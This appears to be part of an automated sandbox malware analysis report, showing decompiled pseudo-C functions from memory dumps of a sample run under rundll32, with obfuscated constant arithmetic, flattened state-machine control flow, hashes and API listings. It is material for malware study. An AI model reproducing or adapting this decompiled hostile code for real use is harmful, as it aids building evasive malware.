                                                                                                                                  				_v64 = _v64 >> 2;
                                                                                                                                  				_v64 = _v64 ^ 0x00114c08;
                                                                                                                                  				_v96 = 0x6b35de;
                                                                                                                                  				_v96 = _v96 * 0x60;
                                                                                                                                  				_v96 = _v96 ^ 0x283b6418;
                                                                                                                                  				_v124 = 0x52b9d2;
                                                                                                                                  				_v124 = _v124 | 0x40c5122c;
                                                                                                                                  				_v124 = _v124 << 8;
                                                                                                                                  				_v124 = _v124 >> 0x10;
                                                                                                                                  				_v124 = _v124 ^ 0x0001910d;
                                                                                                                                  				_v132 = 0x44d0f9;
                                                                                                                                  				_v132 = _v132 * 0x29;
                                                                                                                                  				_v132 = _v132 + 0xf17;
                                                                                                                                  				_v132 = _v132 * 0x65;
                                                                                                                                  				_v132 = _v132 ^ 0x592f3fb2;
                                                                                                                                  				_v72 = 0xc75ad6;
                                                                                                                                  				_v72 = _v72 ^ 0xe0bef3a1;
                                                                                                                                  				_v72 = _v72 ^ 0xe072572c;
                                                                                                                                  				_v80 = 0xa6c1d6;
                                                                                                                                  				_v80 = _v80 + 0xc8d;
                                                                                                                                  				_v80 = _v80 ^ 0x00ac29a9;
                                                                                                                                  				do {
                                                                                                                                  					while(_t188 != 0xe27b71) {
                                                                                                                                  						if(_t188 == 0x372e88b) {
                                                                                                                                  							_push(_t188);
                                                                                                                                  							_push(_t188);
                                                                                                                                  							_t176 = E002D7FF2(_t207[1]);
                                                                                                                                  							 *_t207 = _t176;
                                                                                                                                  							__eflags = _t176;
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								_t188 = 0xe27b71;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						} else {
                                                                                                                                  							if(_t188 == 0x93f98fe) {
                                                                                                                                  								_t207[1] = E002F0C14(_t186);
                                                                                                                                  								_t188 = 0x372e88b;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t188 == 0x9c25eae) {
                                                                                                                                  									_t188 = 0x93f98fe;
                                                                                                                                  									 *_t207 =  *_t207 & 0x00000000;
                                                                                                                                  									_t207[1] = _v76;
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t188 == 0xa0c9f29) {
                                                                                                                                  										_t146 =  &_v112; // 0x2f2047
                                                                                                                                  										E002E0DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
                                                                                                                                  										_t210 = _t210 + 0x10;
                                                                                                                                  										_t188 = 0xc7f60b3;
                                                                                                                                  										continue;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t188 == 0xc7f60b3) {
                                                                                                                                  											_t144 =  &_v84; // 0xe072572c
                                                                                                                                  											E002F0E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
                                                                                                                                  											_t210 = _t210 + 0x10;
                                                                                                                                  											_t188 = 0xcf8cba1;
                                                                                                                                  											continue;
                                                                                                                                  										} else {
                                                                                                                                  											_t219 = _t188 - 0xcf8cba1;
                                                                                                                                  											if(_t188 != 0xcf8cba1) {
                                                                                                                                  												goto L17;
                                                                                                                                  											} else {
                                                                                                                                  												E002F0E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L9:
                                                                                                                                  						return 0 |  *_t207 != 0x00000000;
                                                                                                                                  					}
                                                                                                                                  					E002D3DBC( &_v44, _t207, _v88, _v100, _v136);
                                                                                                                                  					_t210 = _t210 + 0xc;
                                                                                                                                  					_t188 = 0xa0c9f29;
                                                                                                                                  					L17:
                                                                                                                                  					__eflags = _t188 - 0x560a718;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L9;
                                                                                                                                  			}


                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                                  • API String ID: 0-2956538602
                                                                                                                                  • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                  • Instruction ID: d369fa177baa781b4be42722def4ae0ff18c537a7f75d0a9b783065ea024b6f1
                                                                                                                                  • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                                  • Instruction Fuzzy Hash: 4D914E710193419FD368CF65D98692BBBF1FBC4748F10991DF29296220E3B9CA588F43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E002D4816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				void* _t164;
                                                                                                                                  				void* _t179;
                                                                                                                                  				signed int _t190;
                                                                                                                                  				signed int _t191;
                                                                                                                                  				signed int _t192;
                                                                                                                                  				signed int _t193;
                                                                                                                                  				void* _t196;
                                                                                                                                  				void* _t213;
                                                                                                                                  				void* _t214;
                                                                                                                                  				signed int* _t217;
                                                                                                                                  
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_t213 = __edx;
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t164);
                                                                                                                                  				_v4 = _v4 & 0x00000000;
                                                                                                                                  				_t217 =  &(( &_v88)[6]);
                                                                                                                                  				_v16 = 0xc0a747;
                                                                                                                                  				_v12 = 0xade381;
                                                                                                                                  				_t214 = 0;
                                                                                                                                  				_v8 = 0x11050f;
                                                                                                                                  				_t196 = 0x5adc597;
                                                                                                                                  				_v84 = 0xdf9e69;
                                                                                                                                  				_v84 = _v84 >> 2;
                                                                                                                                  				_v84 = _v84 + 0xffff5795;
                                                                                                                                  				_v84 = _v84 >> 5;
                                                                                                                                  				_v84 = _v84 ^ 0x0001b9f8;
                                                                                                                                  				_v68 = 0xf2d8cd;
                                                                                                                                  				_v68 = _v68 << 6;
                                                                                                                                  				_v68 = _v68 | 0xe3b79c6a;
                                                                                                                                  				_v68 = _v68 + 0xec5a;
                                                                                                                                  				_v68 = _v68 ^ 0xffb8abc5;
                                                                                                                                  				_v40 = 0x5d8c34;
                                                                                                                                  				_v40 = _v40 >> 9;
                                                                                                                                  				_v40 = _v40 ^ 0x40002ec6;
                                                                                                                                  				_v28 = 0x37ca39;
                                                                                                                                  				_v28 = _v28 | 0x456668c2;
                                                                                                                                  				_v28 = _v28 ^ 0x0577eafb;
                                                                                                                                  				_v80 = 0xd16358;
                                                                                                                                  				_v80 = _v80 ^ 0xe637ce9d;
                                                                                                                                  				_t190 = 0x68;
                                                                                                                                  				_v80 = _v80 * 0x4b;
                                                                                                                                  				_v80 = _v80 << 2;
                                                                                                                                  				_v80 = _v80 ^ 0x965c2e63;
                                                                                                                                  				_v56 = 0xfc1806;
                                                                                                                                  				_v56 = _v56 + 0xffffb57d;
                                                                                                                                  				_v56 = _v56 | 0x299c1b97;
                                                                                                                                  				_v56 = _v56 ^ 0x29fc2736;
                                                                                                                                  				_v44 = 0x81586;
                                                                                                                                  				_v44 = _v44 | 0xba5390c4;
                                                                                                                                  				_v44 = _v44 ^ 0xba584850;
                                                                                                                                  				_v60 = 0x52e6aa;
                                                                                                                                  				_v60 = _v60 >> 0xa;
                                                                                                                                  				_v60 = _v60 * 0x28;
                                                                                                                                  				_v60 = _v60 ^ 0x00066c4e;
                                                                                                                                  				_v48 = 0x7a334;
                                                                                                                                  				_v48 = _v48 + 0xfffff5af;
                                                                                                                                  				_v48 = _v48 ^ 0x0009652d;
                                                                                                                                  				_v52 = 0x3bf8e8;
                                                                                                                                  				_v52 = _v52 / _t190;
                                                                                                                                  				_v52 = _v52 ^ 0x00025bcb;
                                                                                                                                  				_v64 = 0xacc490;
                                                                                                                                  				_t191 = 0x6f;
                                                                                                                                  				_v64 = _v64 / _t191;
                                                                                                                                  				_v64 = _v64 ^ 0xce7acdce;
                                                                                                                                  				_v64 = _v64 ^ 0xce756fa5;
                                                                                                                                  				_v88 = 0x557b83;
                                                                                                                                  				_v88 = _v88 ^ 0xfc4fd146;
                                                                                                                                  				_v88 = _v88 ^ 0x87bb4e9a;
                                                                                                                                  				_v88 = _v88 ^ 0x18fbc6ce;
                                                                                                                                  				_v88 = _v88 ^ 0x635c68ef;
                                                                                                                                  				_v24 = 0xa24557;
                                                                                                                                  				_t192 = 0x23;
                                                                                                                                  				_v24 = _v24 / _t192;
                                                                                                                                  				_v24 = _v24 ^ 0x00019ec3;
                                                                                                                                  				_v72 = 0x274d3f;
                                                                                                                                  				_v72 = _v72 + 0x3236;
                                                                                                                                  				_v72 = _v72 + 0x71a1;
                                                                                                                                  				_v72 = _v72 + 0x1749;
                                                                                                                                  				_v72 = _v72 ^ 0x0028bc49;
                                                                                                                                  				_v32 = 0x96c762;
                                                                                                                                  				_t193 = 0x44;
                                                                                                                                  				_v32 = _v32 / _t193;
                                                                                                                                  				_v32 = _v32 ^ 0x000b5918;
                                                                                                                                  				_v76 = 0x2f082c;
                                                                                                                                  				_v76 = _v76 + 0x52f3;
                                                                                                                                  				_v76 = _v76 + 0x7ae4;
                                                                                                                                  				_v76 = _v76 ^ 0x81d2744f;
                                                                                                                                  				_v76 = _v76 ^ 0x81f68fa5;
                                                                                                                                  				_v36 = 0x9357ce;
                                                                                                                                  				_v36 = _v36 + 0xfffffb26;
                                                                                                                                  				_v36 = _v36 ^ 0x009b03e6;
                                                                                                                                  				do {
                                                                                                                                  					while(_t196 != 0x4d42949) {
                                                                                                                                  						if(_t196 == 0x5adc597) {
                                                                                                                                  							_t196 = 0x4d42949;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t196 == 0x78e32ab) {
                                                                                                                                  								E002E847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
                                                                                                                                  							} else {
                                                                                                                                  								if(_t196 != 0xf2775cd) {
                                                                                                                                  									goto L11;
                                                                                                                                  								} else {
                                                                                                                                  									_push(_t196);
                                                                                                                                  									_push(_t196);
                                                                                                                                  									_t214 = E002D7FF2(_v20 + _v20);
                                                                                                                                  									if(_t214 != 0) {
                                                                                                                                  										_t196 = 0x78e32ab;
                                                                                                                                  										continue;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L14:
                                                                                                                                  						return _t214;
                                                                                                                                  					}
                                                                                                                                  					_t179 = E002E847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
                                                                                                                                  					_t217 =  &(_t217[8]);
                                                                                                                                  					if(_t179 == 0) {
                                                                                                                                  						_t196 = 0xc32537b;
                                                                                                                                  						goto L11;
                                                                                                                                  					} else {
                                                                                                                                  						_t196 = 0xf2775cd;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L14;
                                                                                                                                  					L11:
                                                                                                                                  				} while (_t196 != 0xc32537b);
                                                                                                                                  				goto L14;
                                                                                                                                  			}
                                                                                                                                  0x002d4a4b
                                                                                                                                  0x002d4a53
                                                                                                                                  0x002d4a5b
                                                                                                                                  0x002d4a63
                                                                                                                                  0x002d4a6b
                                                                                                                                  0x002d4a73
                                                                                                                                  0x002d4a7b
                                                                                                                                  0x002d4a83
                                                                                                                                  0x002d4a83
                                                                                                                                  0x002d4a8d
                                                                                                                                  0x002d4ac9
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4a8f
                                                                                                                                  0x002d4a91
                                                                                                                                  0x002d4b4f
                                                                                                                                  0x002d4a97
                                                                                                                                  0x002d4a9d
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4a9f
                                                                                                                                  0x002d4aaf
                                                                                                                                  0x002d4ab0
                                                                                                                                  0x002d4ab9
                                                                                                                                  0x002d4abf
                                                                                                                                  0x002d4ac5
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4ac5
                                                                                                                                  0x002d4abf
                                                                                                                                  0x002d4a9d
                                                                                                                                  0x002d4a91
                                                                                                                                  0x002d4b58
                                                                                                                                  0x002d4b60
                                                                                                                                  0x002d4b60
                                                                                                                                  0x002d4afa
                                                                                                                                  0x002d4aff
                                                                                                                                  0x002d4b04
                                                                                                                                  0x002d4b10
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4b06
                                                                                                                                  0x002d4b06
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4b06
                                                                                                                                  0x00000000
                                                                                                                                  0x002d4b15
                                                                                                                                  0x002d4b15
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -e$62$?M'$h\c$z
                                                                                                                                  • API String ID: 0-1842174784
                                                                                                                                  • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                  • Instruction ID: 2560b91f70d938e14ca642d8ff335d59e85f967c75194757c10679554ca118af
                                                                                                                                  • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                                  • Instruction Fuzzy Hash: FA812E715193819FD3A8CF62C58991FBBF1FBD9758F408A0DF29586260D3B6CA188F42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002EBE27(intOrPtr* __ecx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				char _v320;
                                                                                                                                  				char _t133;
                                                                                                                                  				signed int _t136;
                                                                                                                                  				void* _t139;
                                                                                                                                  				signed int _t141;
                                                                                                                                  				signed int _t142;
                                                                                                                                  				signed int _t143;
                                                                                                                                  				char* _t144;
                                                                                                                                  				intOrPtr* _t163;
                                                                                                                                  				void* _t164;
                                                                                                                                  
                                                                                                                                  				_v40 = 0x365269;
                                                                                                                                  				_v40 = _v40 >> 7;
                                                                                                                                  				_v40 = _v40 ^ 0x00099806;
                                                                                                                                  				_v16 = 0x620947;
                                                                                                                                  				_v16 = _v16 + 0x25da;
                                                                                                                                  				_v16 = _v16 | 0xf0dff1a3;
                                                                                                                                  				_v16 = _v16 + 0xffff8fd5;
                                                                                                                                  				_v16 = _v16 ^ 0xf0f65193;
                                                                                                                                  				_v60 = 0x4a6911;
                                                                                                                                  				_v60 = _v60 >> 2;
                                                                                                                                  				_v60 = _v60 ^ 0x0015bfec;
                                                                                                                                  				_v32 = 0xee641f;
                                                                                                                                  				_v32 = _v32 ^ 0x54466854;
                                                                                                                                  				_v32 = _v32 ^ 0x51df3278;
                                                                                                                                  				_v32 = _v32 ^ 0x057124b2;
                                                                                                                                  				_v36 = 0x2245a1;
                                                                                                                                  				_t163 = __ecx;
                                                                                                                                  				_t141 = 0x59;
                                                                                                                                  				_v36 = _v36 / _t141;
                                                                                                                                  				_t142 = 0x7c;
                                                                                                                                  				_v36 = _v36 / _t142;
                                                                                                                                  				_v36 = _v36 ^ 0x00022b59;
                                                                                                                                  				_v52 = 0x17e728;
                                                                                                                                  				_v52 = _v52 << 7;
                                                                                                                                  				_v52 = _v52 ^ 0x0bfefc33;
                                                                                                                                  				_v24 = 0x5a7c12;
                                                                                                                                  				_v24 = _v24 + 0xffff6a30;
                                                                                                                                  				_v24 = _v24 + 0xb9bd;
                                                                                                                                  				_v24 = _v24 ^ 0x00522d4c;
                                                                                                                                  				_v8 = 0x70b293;
                                                                                                                                  				_v8 = _v8 ^ 0xb7f64013;
                                                                                                                                  				_v8 = _v8 | 0x98950303;
                                                                                                                                  				_v8 = _v8 << 0x10;
                                                                                                                                  				_v8 = _v8 ^ 0xf38d6f21;
                                                                                                                                  				_v28 = 0x5e48e6;
                                                                                                                                  				_v28 = _v28 >> 2;
                                                                                                                                  				_v28 = _v28 << 0xf;
                                                                                                                                  				_v28 = _v28 ^ 0xc917f664;
                                                                                                                                  				_v44 = 0xd34be4;
                                                                                                                                  				_v44 = _v44 ^ 0x1af04c78;
                                                                                                                                  				_v44 = _v44 ^ 0x1a25cf5b;
                                                                                                                                  				_v56 = 0x13a2c8;
                                                                                                                                  				_v56 = _v56 ^ 0x00107e6c;
                                                                                                                                  				_v20 = 0x6acc1;
                                                                                                                                  				_t143 = 0x48;
                                                                                                                                  				_v20 = _v20 * 0x75;
                                                                                                                                  				_v20 = _v20 | 0x5ce04716;
                                                                                                                                  				_v20 = _v20 ^ 0xfe39b07b;
                                                                                                                                  				_v20 = _v20 ^ 0xa1d6ae77;
                                                                                                                                  				_v48 = 0x9d30cb;
                                                                                                                                  				_t144 =  &_v320;
                                                                                                                                  				_v48 = _v48 / _t143;
                                                                                                                                  				_v48 = _v48 ^ 0x00028c5d;
                                                                                                                                  				_v12 = 0x456efe;
                                                                                                                                  				_v12 = _v12 + 0xffff4082;
                                                                                                                                  				_v12 = _v12 >> 1;
                                                                                                                                  				_v12 = _v12 ^ 0xdbb5e427;
                                                                                                                                  				_v12 = _v12 ^ 0xdb99f5c8;
                                                                                                                                  				while(1) {
                                                                                                                                  					_t133 =  *_t163;
                                                                                                                                  					if(_t133 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					if(_t133 == 0x2e) {
                                                                                                                                  						 *_t144 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						 *_t144 = _t133;
                                                                                                                                  						_t144 = _t144 + 1;
                                                                                                                                  						_t163 = _t163 + 1;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					L6:
                                                                                                                                  					_t164 = E002DADE6(_v40, _v16,  &_v320, _v60);
                                                                                                                                  					if(_t164 != 0) {
                                                                                                                                  						L8:
                                                                                                                                  						_t136 = E002EDBEA(_t163 + 1, _v8, _v28, _v44);
                                                                                                                                  						_push(_v12);
                                                                                                                                  						_push(_t136 ^ 0x2ac2611c);
                                                                                                                                  						_push(_v48);
                                                                                                                                  						_push(_t164);
                                                                                                                                  						return E002DCDCD(_v56, _v20);
                                                                                                                                  					}
                                                                                                                                  					_t139 = E002ECADF(_v32,  &_v320, _v36, _v52);
                                                                                                                                  					_t164 = _t139;
                                                                                                                                  					if(_t164 != 0) {
                                                                                                                                  						goto L8;
                                                                                                                                  					}
                                                                                                                                  					return _t139;
                                                                                                                                  				}
                                                                                                                                  				goto L6;
                                                                                                                                  			}



























                                                                                                                                  0x002ebeff
                                                                                                                                  0x002ebf06
                                                                                                                                  0x002ebf0a
                                                                                                                                  0x002ebf11
                                                                                                                                  0x002ebf18
                                                                                                                                  0x002ebf1c
                                                                                                                                  0x002ebf20
                                                                                                                                  0x002ebf27
                                                                                                                                  0x002ebf2e
                                                                                                                                  0x002ebf35
                                                                                                                                  0x002ebf3c
                                                                                                                                  0x002ebf49
                                                                                                                                  0x002ebf50
                                                                                                                                  0x002ebf5b
                                                                                                                                  0x002ebf5c
                                                                                                                                  0x002ebf5f
                                                                                                                                  0x002ebf66
                                                                                                                                  0x002ebf6d
                                                                                                                                  0x002ebf74
                                                                                                                                  0x002ebf80
                                                                                                                                  0x002ebf86
                                                                                                                                  0x002ebf89
                                                                                                                                  0x002ebf90
                                                                                                                                  0x002ebf97
                                                                                                                                  0x002ebf9e
                                                                                                                                  0x002ebfa1
                                                                                                                                  0x002ebfa8
                                                                                                                                  0x002ebfb9
                                                                                                                                  0x002ebfb9
                                                                                                                                  0x002ebfbd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebfb3
                                                                                                                                  0x002ebfc1
                                                                                                                                  0x002ebfb5
                                                                                                                                  0x002ebfb5
                                                                                                                                  0x002ebfb7
                                                                                                                                  0x002ebfb8
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebfb8
                                                                                                                                  0x002ebfc4
                                                                                                                                  0x002ebfd9
                                                                                                                                  0x002ebfdf
                                                                                                                                  0x002ebffd
                                                                                                                                  0x002ec00c
                                                                                                                                  0x002ec011
                                                                                                                                  0x002ec019
                                                                                                                                  0x002ec01a
                                                                                                                                  0x002ec023
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec029
                                                                                                                                  0x002ebff0
                                                                                                                                  0x002ebff5
                                                                                                                                  0x002ebffb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ec031
                                                                                                                                  0x002ec031
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                                  • API String ID: 0-1567385930
                                                                                                                                  • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                  • Instruction ID: 23b70687a386311adc0fab89ca4e7dee4a716cc1fde9f5d3ab21fde61df6a099
                                                                                                                                  • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                                  • Instruction Fuzzy Hash: F7513271C05219EBDF09CFA5D94A8EEFBB1FF09318F208159E411BA260C7B51A56CF94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                                  • SendMessageA.USER32 ref: 1001B48B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$LongMessageSendWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1063413437-0
                                                                                                                                  • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                  • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                                  • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                                  • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E002E20BA() {
                                                                                                                                  				char _v520;
                                                                                                                                  				signed int _v524;
                                                                                                                                  				unsigned int _v528;
                                                                                                                                  				signed int _v532;
                                                                                                                                  				signed int _v536;
                                                                                                                                  				signed int _v540;
                                                                                                                                  				signed int _v544;
                                                                                                                                  				signed int _v548;
                                                                                                                                  				signed int _v552;
                                                                                                                                  				signed int _v556;
                                                                                                                                  				signed int _v560;
                                                                                                                                  				signed int _v564;
                                                                                                                                  				signed int _v568;
                                                                                                                                  				signed int _v572;
                                                                                                                                  				signed int _v576;
                                                                                                                                  				signed int _v580;
                                                                                                                                  				signed int _v584;
                                                                                                                                  				signed int _v588;
                                                                                                                                  				signed int _v592;
                                                                                                                                  				signed int _v596;
                                                                                                                                  				signed int _v600;
                                                                                                                                  				signed int _v604;
                                                                                                                                  				signed int _v608;
                                                                                                                                  				signed int _v612;
                                                                                                                                  				signed int _v616;
                                                                                                                                  				signed int _v620;
                                                                                                                                  				signed int _v624;
                                                                                                                                  				signed int _t227;
                                                                                                                                  				intOrPtr _t228;
                                                                                                                                  				signed int _t230;
                                                                                                                                  				void* _t231;
                                                                                                                                  				intOrPtr _t235;
                                                                                                                                  				intOrPtr _t245;
                                                                                                                                  				void* _t247;
                                                                                                                                  				intOrPtr _t254;
                                                                                                                                  				signed int _t272;
                                                                                                                                  				signed int _t273;
                                                                                                                                  				signed int _t274;
                                                                                                                                  				signed int _t275;
                                                                                                                                  				void* _t277;
                                                                                                                                  				signed int* _t279;
                                                                                                                                  				void* _t283;
                                                                                                                                  
                                                                                                                                  				_t279 =  &_v624;
                                                                                                                                  				_v612 = 0x15bebb;
                                                                                                                                  				_v612 = _v612 ^ 0x0c09d82a;
                                                                                                                                  				_t247 = 0x7e01d7;
                                                                                                                                  				_v612 = _v612 + 0xffff69e9;
                                                                                                                                  				_v612 = _v612 ^ 0xcffb1e8d;
                                                                                                                                  				_v612 = _v612 ^ 0xc3e0ceeb;
                                                                                                                                  				_v596 = 0xb5bc7f;
                                                                                                                                  				_v596 = _v596 << 0xa;
                                                                                                                                  				_v596 = _v596 + 0xbaa7;
                                                                                                                                  				_v596 = _v596 ^ 0xd6f2b68e;
                                                                                                                                  				_v600 = 0x5909af;
                                                                                                                                  				_v600 = _v600 ^ 0x0096463d;
                                                                                                                                  				_v600 = _v600 >> 3;
                                                                                                                                  				_v600 = _v600 ^ 0x0016e9cd;
                                                                                                                                  				_v548 = 0x801d18;
                                                                                                                                  				_v548 = _v548 + 0xffffc800;
                                                                                                                                  				_v548 = _v548 ^ 0x0070ca5a;
                                                                                                                                  				_v580 = 0x2361dd;
                                                                                                                                  				_v580 = _v580 * 0x6f;
                                                                                                                                  				_t277 = 0;
                                                                                                                                  				_v580 = _v580 << 0xe;
                                                                                                                                  				_v580 = _v580 ^ 0xdbb34e1e;
                                                                                                                                  				_v528 = 0x864281;
                                                                                                                                  				_v528 = _v528 >> 0xc;
                                                                                                                                  				_v528 = _v528 ^ 0x0000b217;
                                                                                                                                  				_v560 = 0x478502;
                                                                                                                                  				_v560 = _v560 | 0x3d47d1eb;
                                                                                                                                  				_v560 = _v560 ^ 0x3d4c1a49;
                                                                                                                                  				_v540 = 0x8f961f;
                                                                                                                                  				_v540 = _v540 >> 0xc;
